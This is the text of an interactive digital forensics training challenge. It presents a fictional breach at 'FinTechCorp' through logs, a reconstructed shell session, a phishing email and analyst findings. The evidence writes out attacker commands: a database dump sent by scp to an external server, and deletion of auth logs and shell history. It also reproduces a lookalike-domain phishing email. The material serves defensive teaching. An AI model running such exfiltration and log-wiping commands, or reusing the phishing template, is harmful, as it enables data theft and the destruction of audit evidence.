Digital Forensics Challenge
Put your cybersecurity investigation skills to the test. Analyze digital evidence to solve the case and identify the culprit behind a data breach.
Select evidence to begin investigation
Security camera footage from the server room, timestamped 2023-03-15 02:34:17
- Image shows afterhours access to the server room
- Person appears to be using a badge that is not their own
- Badge visible in image belongs to "Sarah Chen, IT Support"
- Person in image is not Sarah Chen
- Timestamp shows access at 2:34 AM, outside normal working hours
[2023-03-15 02:12:03] Failed login attempt for user schen@fintechcorp.com from IP 192.168.1.45
[2023-03-15 02:12:17] Failed login attempt for user schen@fintechcorp.com from IP 192.168.1.45
[2023-03-15 02:12:42] Failed login attempt for user schen@fintechcorp.com from IP 192.168.1.45
[2023-03-15 02:13:05] Successful login for user schen@fintechcorp.com from IP 192.168.1.45
[2023-03-15 02:15:32] User schen@fintechcorp.com accessed database customers_financial_records
[2023-03-15 02:18:47] Large data export initiated by user schen@fintechcorp.com (10.2 GB)
[2023-03-15 02:24:15] SSH connection established from IP 192.168.1.45 to external server 45.77.65.211
[2023-03-15 02:26:33] File transfer initiated: customers_financial_records.sql to 45.77.65.211
[2023-03-15 02:30:12] File transfer complete
[2023-03-15 02:31:05] User schen@fintechcorp.com executed command: rm /var/log/auth.log
[2023-03-15 02:32:44] User schen@fintechcorp.com executed command: history -c
[2023-03-15 02:33:16] User schen@fintechcorp.com executed command: rm .bash_history
[2023-03-15 02:35:01] User schen@fintechcorp.com logged out
[2023-03-15 09:15:22] User schen@fintechcorp.com logged in from IP 192.168.1.156
[2023-03-15 09:17:45] User schen@fintechcorp.com reported lost access badge to security
- Multiple failed login attempts indicate possible brute force attack
- Login IP (192.168.1.45) is different from Sarah's normal login IP (192.168.1.156)
- Large data export of customer financial records occurred
- Data was transferred to external IP 45.77.65.211
- Attacker attempted to erase evidence by deleting log files
- Sarah Chen reported her badge missing the next morning
ssh schen@internal-database
Last login: Tue Mar 14 17:45:32 2023 from 192.168.1.156
cd /var/db/customers
ls -la
total 1.2G
drwxr-xr-x 2 dbadmin staff 4096 Mar 14 16:30 .
drwxr-xr-x 5 dbadmin staff 4096 Mar 10 09:12 ..
-rw-r----- 1 dbadmin staff 1.2G Mar 14 16:30 customers_financial_records.sql
-rw-r----- 1 dbadmin staff 2.4M Mar 14 16:30 transactions_march.sql
mysqldump -u admin -p customers_db > /tmp/customers_financial_records.sql
Enter password:
******
scp /tmp/customers_financial_records.sql remote-user@45.77.65.211:/home/remote-user/data/
remote-user@45.77.65.211's password:
******
customers_financial_records.sql 100% 10.2GB 5.8MB/s 29:45
whois 45.77.65.211
% Information related to '45.77.65.211'
Country: Russian Federation
Org: ShadowHost Services
Admin-c: REDACTED
Tech-c: REDACTED
Created: 2022-12-10
Last-modified: 2023-01-05
rm /var/log/auth.log
history -c
rm .bash_history
exit
- SSH login using Sarah Chen's credentials
- Database dump of customer financial records
- Data sent to server in Russia (45.77.65.211)
- Use of "whois" command to confirm server location
- ShadowHost Services is known to provide anonymous hosting
- Attempts to cover tracks by clearing command history
From:
IT-Support@fintechcorp-itservices.com
To:
schen@fintechcorp.com
Date:
March 14, 2023 4:45 PM
Subject:
Urgent: Password Reset Required
Dear Sarah Chen,
Our security system has detected unusual login attempts to your account. As a precautionary measure, we have temporarily locked your account.
Please click the link below to verify your identity and reset your password:
https://fintechcorp-secure.com/password-reset?token=a1b2c3d4
If you did not attempt to log in, please contact security immediately.
Thank you,
IT Support Team
FinTechCorp
- Phishing email sent to Sarah Chen day before breach
- Email domain "fintechcorp-itservices.com" is suspicious (legitimate would be "fintechcorp.com")
- URL "fintechcorp-secure.com" is not the company's genuine domain
- Email was sent during normal business hours to appear legitimate
- Email design and logo closely mimic official communications
- Creates urgency to trick recipient into clicking
- External IP 203.0.113.42 connected to both Sarah's computer (192.168.1.156) and the attacker's location (192.168.1.45)
- The attacker's IP (192.168.1.45) belongs to the company guest WiFi network
- Over 10GB of data was transferred to the Russian server
- Connection from attacker back to 203.0.113.42 after data theft suggests command and control server
- Timeline matches security camera footage showing physical access to server room
- Pattern suggests coordinated attack: phishing + physical access + data exfiltration
Case Solution
Look carefully at all evidence files. Pay special attention to:
- The timeline across different evidence files
- IP addresses and their connections
- The phishing email domain vs. the legitimate company domain
- Physical access evidence combined with digital evidence
Correct!
Case Solved!
Your analysis demonstrates strong skills in:
- Digital evidence analysis
- Log file interpretation
- Network traffic analysis
- Phishing detection
- Timeline reconstruction